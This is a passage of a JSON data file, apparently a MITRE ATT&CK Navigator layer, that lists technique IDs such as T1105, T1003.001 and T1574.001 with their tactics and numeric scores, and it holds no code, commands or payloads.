\"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1136\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.002\",\n      \"tactic\": \"initial-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1555\",\n      \"tactic\": \"credential-access\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1105\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 81,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 94,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1567\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1568.002\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1572\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 24,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1102\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1571\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1082\",\n      \"tactic\": \"discovery\",\n      \"score\": 33,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056.001\",\n      \"tactic\": \"collection\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056.001\",\n      \"tactic\": \"credential-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1123\",\n      \"tactic\": \"collection\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.009\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.009\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1201\",\n      \"tactic\": \"discovery\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1069.001\",\n      \"tactic\": \"discovery\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1007\",\n      \"tactic\": \"discovery\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1222.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.012\",\n      \"tactic\": \"execution\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1529\",\n      \"tactic\": \"impact\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1083\",\n      \"tactic\": \"discovery\",\n      \"score\": 24,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1048.003\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1133\",\n      \"tactic\": \"persistence\",\n      \"score\": 19,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1133\",\n      \"tactic\": \"initial-access\",\n      \"score\": 19,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1033\",\n      \"tactic\": \"discovery\",\n      \"score\": 30,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1593.003\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1115\",\n      \"tactic\": \"collection\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1087.001\",\n      \"tactic\": \"discovery\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1018\",\n      \"tactic\": \"discovery\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1203\",\n      \"tactic\": \"execution\",\n      \"score\": 31,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1068\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 29,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1592.004\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.012\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1554\",\n      \"tactic\": \"persistence\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1046\",\n      \"tactic\": \"discovery\",\n      \"score\": 15,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1587\",\n      \"tactic\": \"resource-development\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 15,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1653\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1016\",\n      \"tactic\": \"discovery\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 34,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1219.002\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 44,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1049\",\n      \"tactic\": \"discovery\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1014\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1518.001\",\n      \"tactic\": \"discovery\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1071.001\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 40,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.002\",\n      \"tactic\": \"execution\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.006\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.006\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1136.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1204.001\",\n      \"tactic\": \"execution\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 47,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 47,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1584\",\n      \"tactic\": \"resource-development\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.006\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.006\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1030\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1057\",\n      \"tactic\": \"discovery\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1499\",\n      \"tactic\": \"impact\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 91,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 91,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 91,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1106\",\n      \"tactic\": \"execution\",\n      \"score\": 14,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.004\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.004\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 27,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.003\",\n      \"tactic\": \"credential-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1040\",\n      \"tactic\": \"credential-access\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1040\",\n      \"tactic\": \"discovery\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1113\",\n      \"tactic\": \"collection\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1560.001\",\n      \"tactic\": \"collection\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1212\",\n      \"tactic\": \"credential-access\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1588.001\",\n      \"tactic\": \"resource-development\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1204\",\n      \"tactic\": \"execution\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1558\",\n      \"tactic\": \"credential-access\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.001\",\n      \"tactic\": \"credential-access\",\n      \"score\": 78,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.002\",\n      \"tactic\": \"credential-access\",\n      \"score\": 26,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1588\",\n      \"tactic\": \"resource-development\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.003\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1047\",\n      \"tactic\": \"execution\",\n      \"score\": 50,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1087\",\n      \"tactic\": \"discovery\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053\",\n      \"tactic\": \"execution\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053\",\n      \"tactic\": \"persistence\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1569.002\",\n      \"tactic\": \"execution\",\n      \"score\": 43,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1112\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 95,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1112\",\n      \"tactic\": \"persistence\",\n      \"score\": 95,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1213\",\n      \"tactic\": \"collection\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1498\",\n      \"tactic\": \"impact\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1041\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      